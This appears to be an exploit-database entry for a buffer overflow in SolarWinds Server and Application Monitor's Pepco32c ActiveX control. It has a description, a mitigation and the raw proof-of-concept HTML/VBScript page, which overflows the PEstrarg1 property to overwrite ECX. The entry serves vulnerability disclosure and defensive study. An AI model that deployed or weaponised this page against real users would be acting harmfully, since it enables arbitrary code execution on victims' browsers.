SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow

vendor:

Server and Application Monitor ActiveX

by:

Blake

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Server and Application Monitor ActiveX

Affected Version From: 6.0

Affected Version To: 6.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:solarwinds:server_and_application_monitor_activex:6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 2003 SP2 / IE

2009

SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow

A buffer overflow vulnerability exists in SolarWinds Server and Application Monitor ActiveX (Pepco32c) due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious web page and convincing a user to view it, resulting in arbitrary code execution in the context of the user.

Mitigation:

Upgrade to the latest version of SolarWinds Server and Application Monitor ActiveX (Pepco32c)

Source

Exploit-DB raw data:

<html>
<!--
SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow
Vendor: SolarWinds
Version: 6.0
Tested on: Windows 2003 SP2 / IE
Download: http://www.solarwinds.com/downloads/
Author: Blake

CLSID: 8AE9F829-D587-42BB-B5C1-09EE8D9547FA
Path: C:\Program Files\Common Files\SolarWinds\Pepco32c.ocx
Member Name: PEstrarg1
Progid: PEPCO32CLib.Pepco
Safe for Scripting: False
Safe for Initialization: False
Kill Bit: False
-->

<object classid='clsid:8AE9F829-D587-42BB-B5C1-09EE8D9547FA' id='target' ></object>
<script language='vbscript'>

' 132 bytes in we control ecx before the call ecx instruction

buffer = String(132, "A")
ecx = String(4, "B")
junk = String(3086, "C")
arg1 = buffer + ecx + junk

target.PEstrarg1 = arg1

</script>